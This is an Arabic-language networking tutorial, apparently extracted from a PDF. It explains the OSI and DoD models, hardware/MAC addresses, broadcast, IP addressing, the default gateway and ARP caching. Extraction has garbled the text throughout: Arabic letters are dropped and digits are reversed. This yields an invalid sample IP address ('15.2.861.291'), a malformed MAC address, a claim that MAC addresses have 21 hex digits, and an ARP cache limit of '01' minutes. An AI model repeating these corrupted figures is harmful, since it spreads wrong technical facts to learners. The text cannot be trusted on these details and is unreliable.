اتصال ‪ ,‬كیفیة‪ ‬‬ ‫استخدامه ‪ ,‬وكیف يفصل التصال عندما تكتمل الجلسة ‪ .‬‬ ‫عندما يبدا التصال تقوم طبقة الجلسة بمراجعة الخطاء المرسلة‪ .‬‬ ‫تضیف معلومات مسیطرة علي حزمة البیانات في اثناء تبادل البیانات‪ .‬‬ ‫‪ 4/ The Transport Layer‬‬ ‫طبقة النقل‪ :‬‬ ‫تضمن الحزم التي تصل‪ .‬‬ ‫توسس للتصال وترسل تقارير بوصول الحزم‪ .‬‬ ‫بروتوكولت ھ ذا التصمیم تمد بوسائل تاسیس ‪ ,‬معالجة ‪ ,‬واطلق التصالت‪ ‬‬ ‫للجھ زة المشتركة في التصال‪ ..‬‬ ‫‪ 5/ The Network Layer‬‬ ‫طبقة الشبكة‪ :‬‬ ‫مسئولة عن تمرير البیانات بناء علي عناوينھا المنطقیة‪ .‬‬ ‫تجزئ وتعید تجمیع الحزم اذا كان ضروريا‪ .‬‬ ‫تحرك الحزم من مصدرھا الي وجھتھا خلل الشبكات‪ .‬‬ ‫‪ 6/ The Data­ Link Layer‬‬ ‫طبقة ربط البیانات‪ :‬‬ ‫يتم فیھا تجھیز البیانات لیتم اخیرا تسلیمھا للشبكة‪ .‬‬ ‫يتم تغلیف الحزم في اطار ( وھ و مصطلح يستخدم ل وصف حزم البیانات الثنائیة‬ ‫‪ 99‬‬ ‫‪(binary data ( .‬البروتوكولت في ھذه الطبقة تساعد في عنونة واكتشاف‪ ‬‬ ‫اخطاء البیانات التي ستحول ‪ .‬‬ ‫تتكون طبقة ربط البیانات من طبقتین ثانويات ‪ :‬الولي ‪ Logical Link Control‬‬ ‫( ‪ (LLC‬او وصلة السیطرة المنطقیة ‪ .‬والثانیة ‪Media Access Control (MAC ( .‬‬ ‫كل طبقة ثانوية تقدم خدماتھا الخاصة ‪ .‬‬ ‫‪LLC‬تمثل واجھ ة بین بروتوكولت طبقة الشبكة وطريقة دخول المیديا ‪ ,‬مثال‪ ‬‬ ‫‪Ethernet‬او ‪ Token Ring .‬‬ ‫‪ MAC‬تعالج التصال مع المیديا الفیزيائیة او توصیلت الشبكة الفیزيائیة مثل‪ ‬‬ ‫‪twisted­pair‬او‪ coaxial cabling .‬‬ ‫‪ 7/ The Physical Laye‬‬ ‫الطبقة المادية ‪ :‬‬ ‫ھي اخر طبقة في نموذج ال ‪ OSI‬وتقوم بتحديد كیفیة ارسال واستقبال قطع‪ ‬‬ ‫البیانات المتحركة في اسلك الشبكة‪ .‬‬ ‫يعمل ھ ذا التطبیق في المنطقة الساخنة من العملیة كلھا ‪ ,‬اذ يضع قطع‪ ‬‬ ‫البیانات في السلك وياخذھا منھا ‪ ,‬وھ نا يمكننا ان نتحدث عن البیانات ك‪ ‬‬ ‫شرائح وحزم‪ .‬‬ ‫والن‪ ..‬كیف يعمل نموذج‪ OSI :‬‬ ‫تخلیق وتصنیع الحزم ‪ packets‬يبدا في قمة نموذج ال ‪ OSI .‬طبقة التطبیق‪ ‬‬ ‫تاخذ البیانات التي سترسل وتمررھا الي السفل الي طبقة التقديم حیث‪ ‬‬


‫توضع علیھا ‪ header‬او معلومات جديدة ‪ .‬طبقة التقديم تمرر حزمة البیانات الي‪ ‬‬ ‫اسفل ‪ ,‬وبنفس الطريقة يقوم كل تطبیق بوضع معلوماته علي حزمة البیانات‪ ‬‬ ‫حتي تسلم في النھ اية الي الطبقة المادية‪ .‬‬ ‫يقوم التطبیق المادي ‪ physical layer‬بتقسیم الحزم علي اسلك الشبكة ‪ ,‬‬ ‫وتستمر البیانات في طريقھا الي وجھتھا‪ .‬‬ ‫في مكان الوصول ‪ ,‬حزم البیانات تتحرك في اتجاه معاكس ‪ ,‬من اسفل النموذج‪ ‬‬ ‫الي العلي ‪ .‬‬ ‫التطبیق المادي في وجھ ة حزمة البروتوكول يقوم باخذ الحزمة خارج اسلك‪ ‬‬ ‫الشبكة ويمررھ ا الي العلي الي طبقة ربط البیانات ‪ .‬طبقة ربط البیانات تختبر‪ ‬‬ ‫معلومات الحزمة التي وضعتھ ا طبقة ربط البیانات علي الحزمة ‪ .‬اذا لم تكن ھذه‬ ‫وجھ ة الحزمة فان الحزمة يتم اعدامھا ‪ .‬اما اذا كانت ھذه وجھة الحزمة تقوم‪ ‬‬ ‫‪ 001‬‬ ‫بروتوكولت تطبیق ربط البیانات بنزع ‪ header‬طبقة التطبیق التي ارسلت مع‬ ‫الحزمة وتمرركل الحزمة الي العلي الي طبقة الشبكة‪ .‬‬ ‫ويتكرر ھ ذا في كل طبقة حتي تصل البیانات الي قمة النموذج ‪ .‬‬ ‫بھ ذه الطريقة اي تطبیق من الكمبیوتر المرسل يتصل مع نفس التطبیق من‬ ‫الكمبیوتر المستقبل ‪ .‬وتسمي ھذه اتصالت طبقة النظیر ‪ peer­layer‬‬ ‫‪ . communication‬‬ ‫نموذج‪ DoD :‬‬ ‫حزمة ال ‪ TCP/IP‬تم تطويرھ ا قبل ان ينشر حتي نموذج ال‪ OSI .‬‬ ‫نتیجة لذلك فان حزمة ‪ TCP/IP‬ل تستخدم نموذج ال ‪ OSI‬كمرجع ‪ .‬‬ ‫‪ TCP/IP‬تم تطويره باستخدام نموذج ال ( ‪Department of Defense ( DoD‬‬ ‫كمرجع ‪ .‬‬ ‫لكن مھم جدا انك تتعامل مع ال ‪ OSI‬والسبب ان ال ‪ OSI‬يستخدم للمقارنة‬ ‫‪ 101‬‬ ‫بین حزمة ‪ TCP/IP‬وباقي حزم البروتوكولت ‪ .‬‬ ‫علي خلف نموذج ال ‪ OSI‬يحتوي نموذج ال ‪ DoD‬علي اربعة طبقات‪ .‬‬ ‫مع ذلك يقوم نموذج ال ‪ DoD‬بمعالجة البیانات بنفس الطريقة التي يعالج بھا‪ ‬‬ ‫نموذج ال ‪ OSI‬نفس البیانات ‪ .‬فقط الختلف في عدد مراحل معالجة البیانات‪ .‬‬ ‫طبقات نموذج ال ‪ DoD‬او وزارة الدفاع‪ :‬‬ ‫‪1/ Application‬يغطي نفس المھام ل التطبیق ‪ +‬التقديم ‪ +‬الجلسة في‪ ‬‬ ‫نموذج‪ OSI .‬‬ ‫‪2/ Transport‬يغطي نفس مھام طبقة النقل في‪ OSI .‬‬ ‫‪3/ Internet‬يغطي نفس مھام طبقة الشبكة في‪ OSI .‬‬ ‫‪4/ Network Interface Layer‬يغطي نفس مھام طبقة ربط البیانات ‪ +‬المادية‪.‬‬ ‫الدروس القادمة سیكون فیھا تفصیل عمل كل طبقة علي حدة ‪ .‬‬ ‫الجدول التالي يوضح مقارنة بین النموذجین وكیف ان ال ‪ DoD‬اختصر كثیر من‪ ‬‬ ‫مھام ال ‪ OSI‬في تصمیمه‪ .‬‬ ‫‪ 201‬‬ ‫مصطلحات ھامـــــــــــــــة‪ ‬‬ ‫‪ )International Organization for Standardization (ISO‬‬ ‫المنظمة الدولیة للمقايیس‪ :‬‬ ‫المنظمة التي صدقت علي نموذج ال‪ OSI .‬‬ ‫‪ )Open System Interconnection model (OSI‬‬ ‫النموذج المرجعي للشبكات‪ ‬‬ ‫نموذج الطبقات السبعة المستخدم في تقسیم المھام التي يحتاج الیھا‪ ‬‬ ‫لتحريك البیانات من كمبیوتر الي اخر‪ .‬‬ ‫‪ Layer‬‬ ‫الطبقة‪ :‬‬ ‫جزء من ال ‪ OSI‬ويقوم بتنظیم المھ ام بین البروتوكولت المختلفة حتي ل يحدث‬


‫تعارض او نقص في عملھا‪ .‬‬ ‫‪ )Department of Defense (DoD‬‬ ‫وزارة الدفاع ( المیركیة طبعا)‪ ‬‬ ‫‪ Peer­layer Communication‬‬ ‫اتصالت طبقة النظیر‪ :‬‬ ‫نوع من التصالت فیھ ا اي تطبیق من الكمبیوتر المرسل يتصل مع نفس‪ ‬‬ ‫التطبیق في الكمبیوتر المستقبل‪ .‬‬ ‫‪ 301‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الخامس ‪ )-1-‬‬ ‫للكاتب‪ AgainstISR&USA :‬‬ ‫‪ The Network Interface Layer‬‬ ‫طبقة واجھ ة الشبكة وطبقة عنوان النترنت وطريق الحزم ‪ .‬ھذه الطبقات‪ ‬‬ ‫تتفاعل مع الشبكة بتعريف كیفیة حركة الحزم من والي الشبكة ‪ .‬كما عرفنا‪ ‬‬ ‫سابقا البروتوكولت تضع معلومات صغیرة علي الحزم مثلما توضع الديباجات‪ ‬‬ ‫علي الطرود التي سترسل عبر البريد‪ .‬‬ ‫طبقة واجھة الشبكة‪ ‬‬ ‫‪ The Network Interface Layer‬‬ ‫ادني طبقة في كتلة ال ‪ TCP/IP‬ھي ال ‪ Network Interface Layer‬او طبقة‪ ‬‬ ‫واجھة الشبكة‪ .‬‬ ‫المسئولیة الرئیسیة ل طبقة واجھة الشبكة ھ ي تعريف كیفیة اتصال كمبیوتر‪ ‬‬ ‫مع الشبكة‪ .‬‬ ‫ھذا اھم جزء في عملیة استلم البیانات‪ ‬‬ ‫الكمبیوتر يجب ان يتبع قواعد ارسال واستقبال البیانات قیاسا الي طبیعة‪ ‬‬ ‫تركیب الشبكة ‪ .‬‬ ‫ھناك طريق واحد لتعرف كیف يتفاعل الكمبیوتر مع طبقة الشبكة حتي‪ ‬‬ ‫تستطیع ان تقارنھا مع مثال واقعي‪ .‬‬ ‫مثال ‪ ::‬لنفرض انك سترسل كرت تمني بالشفاء وكیكة شیكولته لحد‪ ‬‬ ‫اصدقاءك في المستشفي‪ .‬‬ ‫اول خطوة انت مسؤول من تجھیز الشیاء التي سترسلھا كتغلیفھا بمظھر حلو‬ ‫ثم كتابة عنوان علیھا‪ .‬‬ ‫حتي ھنا انت عملت اللي علیك‪ .‬‬ ‫الخطوة التانیة ھي تمريرھ ا لنظام تسلیم اخر له اجراءاته الخاصة به‪ .‬‬ ‫يمكنك ان تستخدم أي شركة خدمات سريعة لتوصیل المغلف ‪ .‬كما يجب ان‪ ‬‬ ‫‪ 401‬‬ ‫تتبع القواعد التي تتعامل بھا الشركة مع زبائنھ ا ‪ ,‬مثال كیفیة كتابة العنوان ‪ ,‬‬ ‫كیفیة الدفع للموظف المسئول ‪ ,‬عنوان ضمان المغلف ( في حالة رجوعه)‪ .‬‬ ‫بعد ان يصل الي صديقي المغلف مش حیھتم بكیفیة وصوله الیه فقط حیكون‪ ‬‬ ‫سعید بالھداء‪ .‬‬ ‫طبقة الشبكة تشبه قسم الستقبال في المستشفي ‪ .‬الموظفین فیھا‪ ‬‬ ‫يستقبلوا كثیر من الشیاء المرسلة لمن في المستشفي ويجب ان يقرروا ما‪ ‬‬ ‫سیرسل منھ ا للمرضي ‪ .‬بعد ان يروا بان ھ ديتك معنونة بصورة صحیحة ‪ ,‬يقوموا‬ ‫بتمريرھا الي صديقك ‪ .‬سیقوم ھو بفك الھدية لیاكل الكیكة ويقرا الكارت‪ ‬‬ ‫المرفق معھا‪ .‬‬ ‫ما ستقوم به طبقة الشبكة في كمبیوتر موصول بشبكة مشابه لما ستقوم به‪ ‬‬ ‫انت مع خدمة ارسال الھدية كشركة‪ .‬‬ ‫طبقة واجھة الشبكة تستخدم لستقبال حزم البیانات ولرسالھا ‪ .‬عند وصول‪ ‬‬ ‫الحزمة بواسطة كرت الشبكة ‪ ,‬تقوم طبقة الشبكة بتمثیل دور قسم الستقبال‬ ‫في المستشفي وتقرر تمرير الحزمة الي كتلة او حزمة البروتوكول لمعالجتھا‪ ‬‬ ‫علي عنوان العتاد او ‪ Hardware address .‬‬ ‫في حال تم تجھ یز الحزمة بواسطة كتلة البرتوكول يتم تمريرھا في النھاية الي‪ ‬‬


‫طبقة الشبكة لتوضع في الشبكة‪ .‬‬ ‫في تطبیق واجھ ة الشبكة المعلومات المرفقة مع الحزمة ‪ Header‬والتي‪ ‬‬ ‫تحتوي علي معلومات عنوان الحزمة‪ .‬‬ ‫ضمن معلومات الحزمة ھناك عنوان اسمه ‪ hardware address‬او عنوان العتاد‪ .‬‬ ‫عنوان العتاد ‪ Hardware Address‬‬ ‫مع أي حزمة من البیانات معلومات عنھا ‪ header‬تحتوي علي معلومات العنوان‪.‬‬ ‫ھذه المعلومات المرفقة تساعد الحزمة علي الوصول الي المكان الصحیح ‪ .‬‬ ‫معلومات العنوان ھ ذه تاتي من عنوان فیزيائي يطبع علي أي كارت شبكة‪ ‬‬ ‫عندما يصنع الكارت‪ .‬‬ ‫ھذا العنوان لن يتغیر طالما يعمل الكارت‪ .‬‬ ‫يطلق علي ھ ذا العنوان أي من السماء التالیة‪ :‬‬ ‫‪ 1/ Hardware Address‬‬ ‫‪ 2/ Media Access Control (MAC)address‬‬ ‫‪ 3/ Ethernet address‬‬ ‫‪ 4/ Physical address‬‬ ‫‪ 5/ Network Interface Card (NIC)address‬‬ ‫‪ 501‬‬ ‫عنوان ال ‪ hardware‬خاص بكل كروت الشبكات ايا كانت الشركة المصنعة ‪ .‬‬ ‫تتكون من ‪ 21‬رقم سداسي عشري ‪ hexadecimal‬في العنوان ‪ .‬وھو يشبه‪ ‬‬ ‫ھذا‪ :‬‬ ‫‪ 500:A0:C9:0F:92:A‬‬ ‫‪::‬اكثر ثلثة انظمة ترقیم مستخدمة في صناعة الكمبیوتر ھي ‪ binary ,‬‬ ‫‪ . :: decimal, hexadecimal‬‬ ‫‪::‬يعد النظام العشري مناسب ُ بالنسبة للبشر ‪ ،‬بینما نظام العد الثنائي يعتبر‪ ‬‬ ‫ا‪ ‬‬ ‫ب بالنسبة لللة ‪ ،‬ويعتبر نظام العد السادس عشر وسط أو توفیق ا‪ ‬‬ ‫مناس ً‬ ‫بینھما‪ ::‬‬ ‫اول ستة ارقام من ارقام ال ‪ hexadecimal‬توضح رقم التصنیع وھو خاص بمصنع‬ ‫كارت الشبكة‪ .‬‬ ‫اخر ستة ارقام تشكل رقم تسلسلي خاص قام بتحديده مصنع كارت الشبكة‪ .‬‬ ‫ملحظة‪ ::‬‬ ‫لكي تحدث كل اتصالت ‪ TCP/IP ,‬الراسل للحزمة يجب ان يعرف عنوان‪ ‬‬ ‫‪hardware‬وجھة التسلیم‪ .‬‬ ‫لكي تسلم حزمة ال ‪ TCP/IP‬يجب ان تحتوي علي عنوان ‪ hardware‬وجھة‪ ‬‬ ‫التسلیم‪ .‬‬ ‫في حال وصول الحزمة الي كارت الشبكة ‪ ,‬القسم من الحزمة الذي يحتوي‪ ‬‬ ‫عنوان ال ‪ hardware‬الھ دف ‪ ,‬يفحص لمعرفة ما اذا كانت الحزمة ھي المقصودة‬ ‫لذلك الجھاز ‪ .‬اذا كان عنوان ال ) ‪hardware‬كارت الشبكة الھدف) الھدف وافق‪ ‬‬ ‫كارت الشبكة المرسل او اذا كانت الحزمة مرسلة الي كل الجھزة بما يسمي‪ ‬‬ ‫بال ‪ Broadcast ,‬فان الحزمة تمرر الي كتلة البروتوكول ‪ TCP/IP‬للمعالجة ‪ .‬اذا‪ ‬‬ ‫كان عنوان ال ‪ hardware‬الھ دف مختلف بالنسبة للحزمة ‪ packets ,‬فان الحزمة‬ ‫تعدم او تنبذ ‪ .‬‬ ‫ارسال الحزم لعدة كمبیوترات مرة واحدة ‪ Broadcast Packets‬‬ ‫أي حزمة يجب ان تكون معنونة للكمبیوتر ‪ .‬كما ذكرنا سابقا عندما تتحرك‪ ‬‬ ‫الحزمة خلل الشبكة ‪ ,‬كل كمبیوتر سیقوم بفحص أي حزمة لیعرف أي منھا‪ ‬‬ ‫معنون الي العنوان الخاص ب ‪ hardware‬الكمبیوتر ‪ .‬‬ ‫‪::‬يعني بالبلدي كده الحزمة ماشیة في الشبكة كل واحد من الجھزة ياخد‪ ‬‬ ‫منھا اللي مرسل لیه وبس ويسیب الباقین لنھم لم يرسلوا له ‪ ::‬كده يمكن‪ ‬‬ ‫‪ 601‬‬ ‫وضحت اكتر ‪ .‬‬


‫لكن ھل يمكن للحزمة ‪ packet‬انھا ترسل لكل الجھزة في وقت واحد ؟‪ ‬‬ ‫الجابة ‪::‬نعم ‪ ::‬‬ ‫حزمة البیانات يمكن ان ترسل الي كل الجھزة في الشبكة مرة واحدة ‪ .‬ھذا‪ ‬‬ ‫النوع يسمي ارسال حزمة لعدة اجھزة ‪ broadcast packet .‬ھذه الحزمة‪ ‬‬ ‫تحتوي علي عنوان مختلف عن عنوان الحزمة العادية المرسلة لجھاز واحد ‪ .‬‬ ‫شكله كالتالي‪ : FF:FF:FF:FF:FF:FF‬‬ ‫طبقة النترنت ‪ The Internet Layer‬‬ ‫طبقة النترنت تقع في نموذج ‪ TCP/IP‬بین طبقة واجھة الشبكة وطبقة النقل ‪.‬‬ ‫طبقة النترنت تحتوي علي البروتوكولت المسئولة من عنونة وتوجیه الحزم ‪ ,‬‬ ‫وھي تحتوي علي عدة برتوكولت ‪ protocols‬تشمل‪ :‬‬ ‫‪ ::1/ Internet Protocol::IP‬‬ ‫‪ ::2/ Address Resolution Protocol ::ARP‬‬ ‫‪ ::3/ Internet Control Message Protocol::ICMP‬‬ ‫‪ 4/ Internet Group Message Protocol ::IGMP‬‬ ‫‪ 701‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الخامس ‪ )-2-‬‬ ‫للكاتب‪ AgainstISR&USA :‬‬ ‫طبقة النترنت‪ The Internet Layer‬‬ ‫طبقة النترنت تقع في نموذج ‪ TCP/IP‬بین طبقة واجهة الشبكة وطبقة النقل ‪ .‬‬ ‫طبقة النترنت تحتوي علي البروتوكولت المسئولة من عنونة وتوجیه الحزم ‪ ,‬وهي تحتوي علي عدة‪ ‬‬ ‫برتوكولت ‪ protocols‬تشمل‪ :‬‬ ‫‪ ::1/ Internet Protocol::IP‬‬ ‫‪ ::2/ Address Resolution Protocol ::ARP‬‬ ‫‪ ::3/ Internet Control Message Protocol::ICMP‬‬ ‫‪ ::4/ Internet Group Message Protocol ::IGMP‬‬ ‫‪ -1‬بروتوكول النترنت‪ Internet Protocl::IP::‬‬ ‫بروتوكول النترنت هو البروتوكول الرئیسي في طبقة النترنت في كتلة ال ‪ TCP/IP .‬هذا‪ ‬‬ ‫البروتوكول مسئول من تحدید مصدر ووجهة ال ‪ IP address‬لي حزمة ‪ .‬‬ ‫نجد ان عنوان بروتوكول النترنت ‪ IP address‬یطلق علي العنوان المنطقي ‪ logical‬‬ ‫‪ address‬هوالذي یقوم مدیر الشبكة بتخصیصه للكمبیوتر‪ .‬‬ ‫كل كمبیوتر في الشبكة له عنوان بروتوكول انترنت خاص به ‪ .‬‬ ‫مثال لل‪ IP address :‬‬ ‫‪ 15.2.861.291‬‬ ‫**********‪ ‬‬ ‫‪.::‬اوكي شباب عاوز انبه علي حاجة هامة ‪ ,‬زي ما لحظتوا انا بكتب المصطلح وترجمته طیب كان‪ ‬‬ ‫ممكن اكتب الترجمة وانسي المصطلح الصلي ‪ ,‬لكن في عالم الواقع عندما تتعامل مع‪ ‬‬ ‫الجهزة ‪,‬‬ ‫وحتي اذا كان نظام التشغیل باللغة العربیة في اشیاء معینة انت ح تلقاها مكتوبة في صورة‬ ‫مصطلحاتها‬ ‫الصلیة ‪ .‬مثال ‪ IP address‬مش ممكن تلقاه مكتوب عنوان بروتوكول النترنت ابدا ال في‪ ‬‬ ‫مكان تاني غیر العدادات‪ .‬‬ ‫یبقي نتفق علي حاجة وهي المصطلح الثابت یعني مش كلمات النجلیزي العادیة‪ ,‬هي هامة لكل‪ ‬‬ ‫من‬ ‫یرید ان یطور نفسه ‪ ,,,‬وكل من یرید ان یتقدم في مجال تقني أي كان لماذا ؟ لنه اذا ظهر علم‪ ‬‬ ‫جدید‬ ‫‪ 801‬‬ ‫وتكنلوجیا جدیدة في مجالك وانت ضعیف في اللغة النجلیزیة حتعرفها كیف !! تنتظر ترجمتها‪ ..‬اوك‬ ‫بعد كم من الزمن ستجد من یترجمها لك بصورة مقبولة ‪ ,‬یبقي في النهایة انسي ومش ح تتقدم‪ ‬‬ ‫ابدا ‪.‬‬ ‫طیب احنا محتاجین ایه الن‪ ,‬مش حاجة كثیرة حاجة واحدة وبس ‪ ,‬بعد ما اترجم المصطلح واكرره‪ ‬‬


‫عدة مرات مش حاستمر في كتابته بالعربي والنجلیزي ساكتفي فقط بكتابته باللغة النجلیزیة یعني‬ ‫اذا‬ ‫لقیت ‪ IP address‬تفهم علي طول ان ده عنوان النترنت وهي اختصار اخر للترجمة نفسها فهي‬ ‫اصل عنوان بروتوكول النترنت واختصارا نقول عنوان النترنت ‪ .‬و ح نبدا من عنوان النترنت‪ ‬‬ ‫ساسمیه في أي شروحات ‪ IP address .‬بدانا به لنه ستعتمد علیه كثیر من الدروس القادمة ‪ .‬‬ ‫‪ .::‬‬ ‫**********‪ ‬‬ ‫هذا العنوان یخصص بواسطة المدیر للكمبیوتر ویجب ان یكون العنوان خاصا بالشبكة الموجود فیها‪.‬‬ ‫جزء من ال ‪ IP address‬یمثل الشبكة التي یوجد فیها الجهاز ‪ host ,‬والجزء الخر یمثل‪ ‬‬ ‫الجهاز نفسه الموجود علي تلك الشبكة ‪ .‬‬ ‫‪::‬الشارع الذي تسكن فیه یشبه ال ‪ IP address .‬الخطاب الذي یرسل الیك سیسلم الي منزلك‪ ‬‬ ‫بسبب العنوان المنطقي ‪ .‬‬ ‫او یمكن ان نشبه الیمیل تبعك بال ‪ IP address .‬الرسالة تصلك لسبب رئیسي وهو ان مرسل‪ ‬‬ ‫الرسالة استخدم عنوانك الصحیح ‪ ,‬والنتیجة ان الرسالة ستصلك بالتاكید بسبب العنوان ‪ .‬‬ ‫اذا رحلت الي بیت اخر في شارع اخر عنوانك سیتغیر وخطاباتك سترسل الي العنوان الجدید ولكن‪ ‬‬ ‫الذي یسلم لك الخطابات هو نفسه‪ . ::‬‬ ‫عندما تمرر ال ‪ Packet‬او حزمة البیانات الي كتلة ال ‪ TCP/IP‬یوضع عنوان الجهة المرسلة‪ ‬‬ ‫والجهة الهدف او المرسل الیها في ال ‪ header IP‬او معلومات ال ‪ IP .‬‬ ‫ال ‪ IP‬یحدد هل الجهاز الهدف محلي ‪ Local‬ام بعید‪ Remote .‬‬ ‫الهدف یكون ‪ local‬اذا ال ‪ IP‬ذكر ان الجهاز الهدف علي نفس الشبكة‪ .‬‬ ‫الهدف یكون ‪ remote‬اذا ال ‪ IP‬ذكر ان الهدف في شبكة اخري‪ .‬‬ ‫ال ‪ IP‬یقوم بتحدید نوع الجهاز الهدف او المستقبل بالعتماد علي ال ‪ IP address‬الموجود فیه‪ ‬‬ ‫وال ‪ Subnet Mask‬في الجهاز المرسل‪ .‬‬ ‫تعریف ال ‪ Subnet Mask ::‬هو هذا الجزء مهم جد ً لنه یحدد هویة الشبكة ‪ ،‬ویستخدم في‪ ‬‬ ‫ا‪ ‬‬ ‫الشبكات الكبیرة عندما یقسم رقم ‪ IP‬واحد إلى عدة أقسام ویصبح كل رقم یمثل شبكة مستقلة‪ ‬‬ ‫ولكن‬ ‫تشترك كل هذه الشبكات بهویة واحدة یمثلها الـ ‪ Subnet Mask‬و الـ ‪ Subnet‬تعني التقسیم‪ ‬‬ ‫وهو الذي یحدد رقم الشبكة ورقم الجهاز ‪ ::.‬سنتعرف علیه بالتفصیل في الدروس القادمة‪ .‬‬ ‫‪ 901‬‬ ‫تحدید وجهة البیانات محلیة ‪: local‬ام بعیدة ‪ remote :‬‬ ‫ال ‪ IP‬یحتاج الي تحدید كیف یوصل البیانات الي وجهتها‪ .‬‬ ‫اذا الجهة(الجهاز) عنوانها في شبكة محلیة ‪ TCP/IP‬یمكن ان یتصل مباشرة مع الجهاز المقصود‪ .‬‬ ‫اذا كان الجهاز في شبكة اخري او بعیدة فان ال ‪ TCP/IP‬یحتاج الي ارسال الحزمة من خلل ال‪ ‬‬ ‫‪ . Default Gateway‬‬ ‫تعریف ال ‪Default Gateway ::‬یسمي ایضا ‪ Router ,‬هو عنوان في الجهاز ‪ host‬‬ ‫علي الشبكة یقوم بتوفیر طریق خارج الشبكة المحلیة ‪ .‬بمعني اخر ‪ ,‬ال ‪ default gateway‬‬ ‫عبارة عن باب یساعد علي الدخول من خارج الشبكة‪ . ::.‬‬ ‫عملیة اتصالت ال ‪ TCP/IP's‬مشابهة لرسال الطرد ‪ .‬اذا اردت ارسال الطرد لشخص یسكن في‬ ‫نفس الشارع الذي تسكن انت فیه ‪ ,‬یمكنك ان تسلم الطرد بنفسك ‪ .‬اذا ارسلت الطرد الي شخص‬ ‫یسكن‬ ‫في أي شارع اخر ‪ ,‬یجب ان یذهب الطرد الي مكتب البرید ‪ ,‬بعد ذلك مكتب البرید سیقرر كیف‪ ‬‬ ‫یسلم‬ ‫الطرد الي الجهة المطلوبة ‪ .‬مكتب البرید یشبه البوابة الفتراضیة ‪ Default Gateway .‬‬ ‫الشكل التالي یوضح ان ال ‪ ROUTER‬یشبه صندوق البرید الذي یوزع الطرود الي الشبكة‪ ‬‬ ‫الصحیحة‪ :‬‬ ‫الشكل التالي یصور كمبیوتر ‪ RAAD‬یرسل حزمة بیانات الي جهاز شكولته‪ .‬‬ ‫بروتوكول ال ‪ IP‬في حزمة ‪ RAAD‬سیحلل عنوان الجهة المرسلة شكلته ویحدد ان شكلته‪ ‬‬ ‫جهازها ‪ Local‬او محلي بالنسبة للجهاز المرسل‪ RAAD .‬‬ ‫شكل یوضح عمل الراوتر‪ ‬‬


‫‪ 011‬‬ ‫‪::‬الجهاز الهدف او المرسل الیه الحزمة یكون ‪ local‬عندما یحدد ال ‪ IP‬ان الثنین الراسل‪ ‬‬ ‫والجهزة المرسل الیها لها نفس قسم الشبكة في عناوین ال ‪ IP‬التي خصصت لها‪ .‬‬ ‫اذا كان الجهاز الهدف محلي ‪ Local‬فان ال ‪ IP‬یحتاج الي ان یاخذ عنوان كارت الشبكة من الهدف‬ ‫‪ .‬‬ ‫اذا كان الجهاز الهدف بعید ( أي في شبكة اخري ( فان ال ‪ IP‬یبحث في جدول المسارات‪ ‬‬ ‫‪routing table‬عن اوضح طریق الي تلك الشبكة‪ .‬‬ ‫اذا و جد في جدول المسارات العنوان او الطریق الذي یریده فان عنوان ال ‪ IP‬یاخذ ال ‪gateway‬‬ ‫او العنوان الذي یرید من جدول المسارات‪ .‬‬ ‫اذا لم یكن هناك عنوان او طریق في الجدول طبعا ‪ , IP‬یحتاج الي ان یاخذ عنوان الكارت للبوابة‪ ‬‬ ‫الفتراضیة‪ default gateway .‬‬ ‫طبعا ده كله سیتم تشریحه في الدروس القادمة‪ .‬‬ ‫تحدید عنوان ال ‪ hardware‬او الكارت‪ ::‬‬ ‫المخطط ادناه تمثیل لعملیة القرار التي یستخدمها ال ‪ TCP/IP‬لیحدد أي من عناوین ال‪ ‬‬ ‫‪hardware‬او كارت الشبكة او ال ‪ Mac address‬هي المطلوبة لرسال الحزمة ‪ :‬‬ ‫‪ 111‬‬ ‫عندما یخصص ‪ IP address‬ل ‪ host ,‬یقوم مدیر الشبكة ‪ Administrator‬بكتابة عنوان‬ ‫ال ‪ Default gateway‬كجزء من متغیرات ‪ TCP/IP .‬الحزمة سترسل الي البوابة‪ ‬‬ ‫الفتراضیة لل ‪ mac address‬یفترض ان تتجه الي شبكة اخري‪ .‬‬ ‫‪Default gateway‬بعد ذلك یحدد ما اذا كان ال ‪ IP‬المستهدف موجود علي احد الواجهات او‪ ‬‬ ‫الكروت المدرجة عنده او هو یحتاج الي ان یمرر الحزمة الي ‪ Router‬اخر‪ .‬‬ ‫باستخدام قیاس اخر ‪ ,‬هذا یشبه الذهاب الي المطار والسفر الي جهة ‪ .‬اذا كان هناك طریق مباشر‪ ‬‬ ‫من‬ ‫المطار الي جهتك ‪ ,‬ستستخدمه ‪ .‬اذا لم یتواجد طریق مباشر سترسل عبر اقرب طریق الي‪ ‬‬ ‫جهتك‪.‬‬ ‫في الخطوة القادمة ال ‪ IP‬یستخدم ‪ ARP‬للحصول علي ال ‪ Hardware address‬للجهاز‪ ‬‬ ‫المستهدف ‪ .‬ال ‪ ARP‬هنا یشبه المحقق الذي سیجد عنوان ال ‪ hardware‬للجهاز المستهدف بناء‬ ‫علي عنوان ال ‪ IP‬الذي یسال عنه ال‪ Internet Protocol .‬‬ ‫‪ -2‬بروتوكول اقرار العنوان‪ Address Resolution Protocol ::ARP ::‬‬ ‫یقوم هذا البروتوكول بترجمة عنوان ال ‪ IP‬الي عنوان العتاد‪ .‬‬ ‫لیترجم ‪ ARP‬عنوان ‪ IP‬اول مكان ینظر فیه هو ‪ ARP cache ,‬وهي مكان في الذاكرة‪ ‬‬ ‫العشوائیة ‪ random access memory::RAM:: ,‬یحفظ فیه ‪ ARP‬عناوین ال ‪ IP‬‬ ‫وعناوین العتاد التي تمت ترجمتها ‪ .‬‬ ‫طیب اذا ال ‪ ARP‬وجد عناوین ال ‪ IP‬و العتاد في ال ‪ ARP cache ,‬فان الحزمة تعنون‪ ‬‬ ‫بعنوان العتاد من غیر بحث زائد ‪ .‬‬ ‫الحالة الثانیة اذا ال ‪ IP address‬غیر موجود في ‪ ARP cache‬یقوم ‪ ARP‬بطلب نشر لكل‪ ‬‬ ‫الجهزة ‪ .‬‬ ‫‪::‬بعد ان یتم تخصیص ال ‪ address IP‬لعنوان العتاد ‪ ,‬یخزن في ‪ ARP cache‬لمدة‪ ‬‬ ‫دقیقتین ‪ .‬‬ ‫اذا ال ‪ IP‬طلب البحث مجددا لنفس عنوان ال ‪ IP‬في خلل هذه الدقیقتین ‪ ,‬فان المدخل یبقي‪ ‬‬ ‫مرة‬ ‫اخري في ال ‪ ARP cache‬او ذاكرة ال ‪ ARP‬لدقیقتین اخریین ‪ .‬المدخل یبقي في ذاكرة ال‪ ‬‬ ‫‪ARP‬كحد اقصي ‪ 01‬دقائق ‪ ,‬بعد ذلك یتم اخراجها من ذاكرتها ‪ .‬‬ ‫‪ 